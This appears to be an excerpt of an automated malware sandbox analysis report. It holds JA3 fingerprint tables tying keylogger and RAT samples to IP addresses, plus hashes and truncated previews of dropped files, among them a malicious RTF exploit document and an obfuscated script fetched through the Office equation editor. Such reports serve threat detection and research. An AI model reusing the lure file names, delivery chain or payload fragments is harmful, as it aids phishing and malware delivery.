	xd.mips.elf	Get hash	malicious	Mirai	Browse	34.142.42.103
	xd.mips64.elf	Get hash	malicious	Unknown	Browse	57.227.70.187
	file.exe	Get hash	malicious	Babadeda	Browse	34.149.100.209

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	invoice.docx.doc	Get hash	malicious	FormBook	Browse	188.114.97.3 188.114.96.3
	New order.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3 188.114.96.3
	042240724.xls	Get hash	malicious	Remcos	Browse	188.114.97.3 188.114.96.3
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3 188.114.96.3
	dukas022.docx.doc	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	S004232824113048.xls	Get hash	malicious	Remcos, DBatLoader	Browse	188.114.97.3 188.114.96.3
	VERDACHT_New Order 8025047.docx	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	aabJ5lAG3l.doc	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	5i4hBrTNHm.rtf	Get hash	malicious	AgentTesla	Browse	188.114.97.3 188.114.96.3
7dcce5b76c8b17472d024758970a406b	invoice.docx.doc	Get hash	malicious	FormBook	Browse	188.114.97.3
	042240724.xls	Get hash	malicious	Remcos	Browse	188.114.97.3
	Scan file.doc	Get hash	malicious	Unknown	Browse	188.114.97.3
	fLnj4EeH6V.rtf	Get hash	malicious	Unknown	Browse	188.114.97.3
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	DRAFT AWB and DRAFT Commercial invoice.xls	Get hash	malicious	Remcos	Browse	188.114.97.3
	dukas022.docx.doc	Get hash	malicious	Unknown	Browse	188.114.97.3
	S004232824113048.xls	Get hash	malicious	Remcos, DBatLoader	Browse	188.114.97.3
	VERDACHT_New Order 8025047.docx	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	XrAADcYten.rtf	Get hash	malicious	Remcos	Browse	188.114.97.3
36f7277af969a6947a61ae0b815907a1	2FBexXRCHR.rtf	Get hash	malicious	AgentTesla	Browse	34.166.62.190 93.113.54.56 188.114.96.3
	042240724.xls	Get hash	malicious	Remcos	Browse	34.166.62.190 93.113.54.56 188.114.96.3
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	34.166.62.190 93.113.54.56 188.114.96.3
	S004232824113048.xls	Get hash	malicious	Remcos, DBatLoader	Browse	34.166.62.190 93.113.54.56 188.114.96.3
	M6hS9qGbFx.rtf	Get hash	malicious	AgentTesla	Browse	34.166.62.190 93.113.54.56 188.114.96.3
	DRWG-347RB1.pd.xls	Get hash	malicious	Unknown	Browse	34.166.62.190 93.113.54.56 188.114.96.3
	Purchase Order - P04737.xls	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	34.166.62.190 93.113.54.56 188.114.96.3
	INV 66077.xls	Get hash	malicious	AgentTesla	Browse	34.166.62.190 93.113.54.56 188.114.96.3
	DRWG-347RB1.pd.xls	Get hash	malicious	FormBook	Browse	34.166.62.190 93.113.54.56 188.114.96.3
	cz2afaNerh.rtf	Get hash	malicious	AgentTesla	Browse	34.166.62.190 93.113.54.56 188.114.96.3

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.247897867253902
Encrypted:	false
SSDEEP:	6:kK+9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:JDImsLNkPlE99SNxAhUe/3
MD5:	492ABC35CC80AF4ABACBD5FC14CCBF67
SHA1:	FB3212A74A130292EC7FAFDF7AB8ECCC05B3DC87
SHA-256:	A556E0CAA837382A92FBB8FAC60B0BA4195F1A2FF10F3BF5933EDD5607ECA36E
SHA-512:	674B89562474CEA58A529ECCFFD9CCF6AADBC4166B3DF02630FC4C76E457FE5BF3B2287F0B8C6AE92D6B3362DC50610416E0DA52C27CB7CA1673D6BF145CE564
Malicious:	false
Preview:	p...... ...........^K...(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025713566417307078
Encrypted:	false
SSDEEP:	6:I3DPcBgOsCVvxggLRawUzld8qDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPgLscXq1vYg3J/
MD5:	EDB3AE9B510FB6CE9285B11B3E4D8B15
SHA1:	6AE44EA35594688A9AA9BB983EE8DE57EED8D02D
SHA-256:	318F1DA0DA86CACEB1E3152CF75602CCFCB748DA921A9D4F603E4A42FAD93E7B
SHA-512:	F522D0AD4E5FB429AA3E70C8EF749BF53F83970FC1E6F250F41C0AA43AF92E27DD7CBF7C5A7022C5AA7FAE81C11005EDA457AF0B00C66814D751196F06DF5949
Malicious:	false
Preview:	......M.eFy...zel.YT..N......:'S,...X.F...Fa.q..............................U....D.@....L...........G.bD.....O.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6934
Entropy (8bit):	4.782948992571194
Encrypted:	false
SSDEEP:	192:BxoeRuVsm5emlMiMDOmEN3H+OHgFQVFn3eGOVpN6K3bkkjo5B3YrKkD:GwiQ0HzAFQVoGIpN6KQkj2g
MD5:	CC3ADDB80C635733281BAC3F4123B73C
SHA1:	9611CD47639CC0633FC59D27179D878D678D0999
SHA-256:	368BFC4F4E9AE3B4896E033BFD85F6209D45E9016BF36B9294F12F0A12AAF6C4
SHA-512:	28AA862AE188472696E678A4529C1A21AA61F0E748BED1B2DCA43D6F69D7E6315B878443D5A4A07CE956AF96CA19C50875A0D14DB719650E787A168FFDDE6C97
Malicious:	false
Preview:	PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Set-PSRepository........Update-ScriptFileInfo........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Oi8[1].htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	167
Entropy (8bit):	4.43745738033235
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLGWbRIwcWWGu:q43tISl6kXiMIWSU6XlI55bRIpfGu
MD5:	0104C301C5E02BD6148B8703D19B3A73
SHA1:	7436E0B4B1F8C222C38069890B75FA2BAF9CA620
SHA-256:	446A6087825FA73EADB045E5A2E9E2ADF7DF241B571228187728191D961DDA1F
SHA-512:	84427B656A6234A651A6D8285C103645B861A18A6C5AF4ABB5CB4F3BEB5A4F0DF4A74603A0896C7608790FBB886DC40508E92D5709F44DCA05DD46C8316D15BF
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>cloudflare</center>..</body>..</html>..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\createdthingstobefrankwithmeeverywhere[1].gif

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	415824
Entropy (8bit):	3.5864483548852926
Encrypted:	false
SSDEEP:	3072:bHGMwf1YFjhNe4VTdRnTT8w4TW72qjnEgFypBzxjJS7GzYhOJ8XuBYO0zCV2:Xwf1YFB2qjt
MD5:	4D03B030F4DB434DA80E0EC3FA7E4398
SHA1:	0B4EED00595BE5235F5A51CEBEDA6FA31402B94B
SHA-256:	90AFE2E4506B34BD63E597279707D13C6D8512FD52E0B670C9E45890211C76B6
SHA-512:	7EC4DF4E21931E9091E77D9A23C7D81DE11B89C3D0968CD6E8ABA8F425CDA85B357E4410B3A5A0BB28E80C2AD4999D8C3CC1FBA06A2346720F3ABAD435CE9EBB
Malicious:	false
Preview:	..d.i.m. .g.a.m.e.l.a.n. .....g.a.m.e.l.a.n. .=. .o.p.s.o.p.h.a.g.i.a.....c.a.b.i.r.t.o.(.".b.i.s.t.o.r.t.a.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".l.a.c.h.a.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".c.a.n.t.o.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".v.u.l.g.o.c.r.a.c.i.a.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".X._.H.e.l.p.U.r.i.s._.0.0.5._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".c.o.i.s.i.c.a.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".p.o.r.t.e.l.l.o.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".X._.H.e.l.p.U.r.i.s._.0.0.8._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".X._.H.e.l.p.U.r.i.s._.0.0.9._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".X._.H.e.l.p.U.r.i.s._.0.1.0._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".L._.H.e.l.p.U.r.i.s._.0.1.1._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\createdgoodthingstogetmebacktheentirethingsinolineswitchtogilfrnfboobstounderstandhowfeelurareinthesituation_____________creanthesituationgirlfrnd[1].doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Rich Text Format data, version 1
Category:	dropped
Size (bytes):	83905
Entropy (8bit):	2.742026559641091
Encrypted:	false
SSDEEP:	768:/GsPG7psvvYOj60coo9jYt2uICjDdY29Hnv:/GCkWv7O9jxqjDd7F
MD5:	9F63EE5EF179CFCF56619E1C9D44447A
SHA1:	6C9EFBC2D4A76E25D826F85B7F0D27906CADE93A
SHA-256:	59D95B241A02FBEF4D098FE7FF3CE6A5B97E638661429702744436C90C3047FA
SHA-512:	4333778CE1805BC95F648EB17B614ED29561431623AB1E6B5A12C6B85338A269E6AABFC7D78FFF5170AFEDB839477AA19947F9AFC3C123E9C8920A82D5165F2E
Malicious:	true
Yara Hits:	Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\createdgoodthingstogetmebacktheentirethingsinolineswitchtogilfrnfboobstounderstandhowfeelurareinthesituation_____________creanthesituationgirlfrnd[1].doc, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	{\rtf1...........{\\fontinfo695314223 \,}.{\980066950`-@!_.);^_?5`%[?~-<3&5,7^,>.[#:%0;(^`.[6[9#^0<?\|]][$~&3:+424`?23$0??&:$/,<^9?.]?<\|_=3.88_?:?%&0.2:/!(~:<<.>.9-~%..(?&95?-;%-2^?)?/=8[](.:~=+?$?5+?<\|)]?$4'^_@3._6;[&+^2_7(=4#''.?=.[/?[.!5'.@]?,)-6^-8+/;=>]7?^#4.?.:$#&7/\|]+^?%/??^.7$4:/1%:28,[:%.(7.-%-^4)35?=.-41!.!\|^1^!-#)@.)~$)\|7='232-3)86&#5:~`-0/@,?\|)^59_-62_2_5$5!(6]`'9]?`3.925$2?$#,39?6?.!%2$^^~?7?;&+++5'%;$)?<=?%.>!..52^>?:%>8+.?.0_?83%!+[8?2]8(#=??%0(/3,[>>\|?.]?(?`.,]!:5.3?_9?)+5&=^2..2..?0.:?583!..?:#+!)8%\|??$++?$(?5#@\|?4-@1$8?~5'?^^(?3??4/_@.+@~@\|_?%(1.?`[4<'-./.?&)__.?314<-+7$6?~:+956.:?;:6%5,>,[.$[.'30.$$\|$#1/=%6/!(%=(?%?(;6%&8]>%<3.6=%@.?[1.7#[?7`,?#[=]'0/6]>891%31+?,!\|?..<%`8<,?>@-1]5398/?+_~%.(.?-)+\|?++3+\|_]'>]+%91`!-4?>^+@?):<-.^%>??=?8..?/%4<!+5$&/??(<00/%+9$]~\|?#.>.1:!@]?^?./]>?0.$&9.8[]/,;)33@?!/.8371%,/.0=//!.?<?8@~?(_>7:?1!!=3]\|&/0^5:)#5?$$7^?..\|@1(22_?4-3.7:?>??!??38._%~^-#7!.&8?!...<;).:])/8&?<?]?_%.=./<3.[/.9$?753(~4&.6]?]?59`@*?(@-42?+

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.013811273052389
Encrypted:	false
SSDEEP:	12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5:	18BC6D34FABB00C1E30D98E8DAEC814A
SHA1:	D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
SHA-256:	862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
SHA-512:	8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
Malicious:	false
Preview:	{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6238021F.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	2948912
Entropy (8bit):	3.8750250683748217
Encrypted:	false
SSDEEP:	12288:K1U2PI5R32GnjPjIwcusrwvsWXKcnXfxpMZacUkRaN7Hjo1PWwuD8dt3iGnjPjIM:KC2OR30wOSKx1Owuat3wwKuWh1Ow2
MD5:	D422C21BFE1DFBDEEF3B9D242BB435A4
SHA1:	EA3AC5AF5CF4F436B1CAAE809FA29C2A5A21729A
SHA-256:	93B27EEDAAEB1E7CBDEEDE4B9EC3EC953991B65F15C24D6544D9664647665190
SHA-512:	D4649E7022DD667C02273C707E0FC8A1673956014DDA39A3A7FA67D8525613EA3B11E27D054826225DD846CBC9E185D56F897FFD51217E872453B78E330A927D
Malicious:	false
Preview:	....l...............r...........QN...a.. EMF....0.,.1.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\715CC54E.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Rich Text Format data, version 1
Category:	dropped
Size (bytes):	83905
Entropy (8bit):	2.742026559641091
Encrypted:	false
SSDEEP:	768:/GsPG7psvvYOj60coo9jYt2uICjDdY29Hnv:/GCkWv7O9jxqjDd7F
MD5:	9F63EE5EF179CFCF56619E1C9D44447A
SHA1:	6C9EFBC2D4A76E25D826F85B7F0D27906CADE93A
SHA-256:	59D95B241A02FBEF4D098FE7FF3CE6A5B97E638661429702744436C90C3047FA
SHA-512:	4333778CE1805BC95F648EB17B614ED29561431623AB1E6B5A12C6B85338A269E6AABFC7D78FFF5170AFEDB839477AA19947F9AFC3C123E9C8920A82D5165F2E
Malicious:	true
Yara Hits:	Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\715CC54E.doc, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	{\rtf1...........{\\fontinfo695314223 \,}.{\980066950`-@!_.);^_?5`%[?~-<3&5,7^,>.[#:%0;(^`.[6[9#^0<?\|]][$~&3:+424`?23$0??&:$/,<^9?.]?<\|_=3.88_?:?%&0.2:/!(~:<<.>.9-~%..(?&95?-;%-2^?)?/=8[](.:~=+?$?5+?<\|)]?$4'^_@3._6;[&+^2_7(=4#''.?=.[/?[.!5'.@]?,)-6^-8+/;=>]7?^#4.?.:$#&7/\|]+^?%/??^.7$4:/1%:28,[:%.(7.-%-^4)35?=.-41!.!\|^1^!-#)@.)~$)\|7='232-3)86&#5:~`-0/@,?\|)^59_-62_2_5$5!(6]`'9]?`3.925$2?$#,39?6?.!%2$^^~?7?;&+++5'%;$)?<=?%.>!..52^>?:%>8+.?.0_?83%!+[8?2]8(#=??%0(/3,[>>\|?.]?(?`.,]!:5.3?_9?)+5&=^2..2..?0.:?583!..?:#+!)8%\|??$++?$(?5#@\|?4-@1$8?~5'?^^(?3??4/_@.+@~@\|_?%(1.?`[4<'-./.?&)__.?314<-+7$6?~:+956.:?;:6%5,>,[.$[.'30.$$\|$#1/=%6/!(%=(?%?(;6%&8]>%<3.6=%@.?[1.7#[?7`,?#[=]'0/6]>891%31+?,!\|?..<%`8<,?>@-1]5398/?+_~%.(.?-)+\|?++3+\|_]'>]+%91`!-4?>^+@?):<-.^%>??=?8..?/%4<!+5$&/??(<00/%+9$]~\|?#.>.1:!@]?^?./]>?0.$&9.8[]/,;)33@?!/.8371%,/.0=//!.?<?8@~?(_>7:?1!!=3]\|&/0^5:)#5?$$7^?..\|@1(22_?4-3.7:?>??!??38._%~^-#7!.&8?!...<;).:])/8&?<?]?_%.=./<3.[/.9$?753(~4&.6]?]?59`@*?(@-42?+

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B64ED16C.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	3499808
Entropy (8bit):	4.393785878467254
Encrypted:	false
SSDEEP:	24576:OvUVKAkKL30wm2CH18w8l8at3wwKuWh1Owf:OvUVKAkKL30wkH18w8l8at3wwkh1Owf
MD5:	21B7477C05302F1C48C7591CF250EBC3
SHA1:	A1D04762A0E79AC26DBDCC1C60C02615B7B40C45
SHA-256:	82ACF67726FBE109F47BEFD442A3689A9AEEE47712EFAB34BC1829B0DB59CEE7
SHA-512:	9DFF14496C2224967401925080E40CD55FFD2D5E23963D0E5CA38B4743A7D0B79EFA369023574212F92636349202C3AAEEF85051F7706A6D1A22F18B5F365CC6
Malicious:	false
Preview:	....l...............)............S..%;.. EMF.... g5.>...*.......................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................\......."...........!...............................................\......."...........!...............................................\......."...........!...............................................\......."...........!...............................................\.......'.......................%...........................................................L...d.......D...[...........D...\...D...!..............?...........?................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA43EF57.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	46272
Entropy (8bit):	3.149065092156345
Encrypted:	false
SSDEEP:	384:xs3So/qUwzAIBYPW4F05YOjce/GzgwJ2dIKJy/USCwI6LlIqyU6:o+zAI8F05GblUnE/USCl
MD5:	A93933D4187C3E64A4485F706116A89B
SHA1:	F8004709E6B16486E21B92B8A1711B61413DFB4B
SHA-256:	BCF03DB7518B78AE046C1200CAA76A574C45B491BFCC2DFD06E5567EAC509D26
SHA-512:	7DA15976DEA026A707515DF9341FE1A89004E3C429A3318E4C93C0ABF35FAF884A3204E939F9E9CF527BEFEE3E945F8DE6E0FA8D114E814BE518F9DD93DA8C5E
Malicious:	false
Preview:	....l...........:...............~@..xW.. EMF........U.......................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%.......................R...p................................@..T.i.m.e.s. .N.e.w. .R.o.m.a.n.........................................................................TK........................................... ...............................G................*..Ax...N..............T.i.m.e.s. .N.e.w. .R.o...F.....6...................................................................dv......%...........%...........%.......................T...T...........+...q........i.@...@....Z.......L...............<.......P... ...,...............T...T...,.......W...q........i.@...@,...Z.......L...............<.......P... ...,...............T...T...X...........q........i.@...@X...Z.......L...............<...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F697BD29.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	3397516
Entropy (8bit):	4.230733716789902
Encrypted:	false
SSDEEP:	12288:V0Bd8yCKdQE1P8gP5m3xGnj+jIwous2wvZWXKcnXfxp/Za7UkGaN8HEo1iWwJ1kz:ol8Sm3ww6CCC1hwJqZat3wwKuWh1Own
MD5:	BB1DFAC173EA288B929B981E27F4CB06
SHA1:	4E0D9D29319026A4C5CAED066D1DC85FE69D0231
SHA-256:	ABE06F7DB8E43BD74850701965A6534BD5AE52F39C7EC4C3244FE417790D17BC
SHA-512:	97D95124A1AF95C51FA27C51F29B7D5E16A74DAAAFA835F23D0C02C6F7159E0B2B8C6A785269C5CBCEDC1492FB977BED788879000844B55A909D2A2213D29261
Malicious:	false
Preview:	....l...............M............K...8.. EMF......3.>...)...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&...'.......................%...........................................................L...d.......W...0...........W...1...T...!..............?...........?................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E4A5FB01-995F-4785-9031-8AAEF937D825}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.840871293278178
Encrypted:	false
SSDEEP:	192:ExPOgOpRq2rUN+pmPNgOpRqbrUN+prBPTgO88RqbrUN+prBPTgOpRylbrUN+praw:ExPPsq4mPisf4FPE0f4FPEsx4uPEsD4
MD5:	FEA6C8A24D71363606D44CE773EBE0CC
SHA1:	14D2690970D5F18B04AA046612D35912E6A6C2D5
SHA-256:	BCEE4490DCFE784F47C256A0B95D77246A8DA220D5CA9C66113677F38C56DE44
SHA-512:	B80771A629144AC7EAE883780D3FF08624341D3B7D3B055085CDAAF23CA4FDCFF20A9536304F5A08FE1BAB1EEEA7BBD655D3D525552FE53E7378560580B2B81F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0D34D727-E2F1-4E31-A3E3-D5300EB8E8D7}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
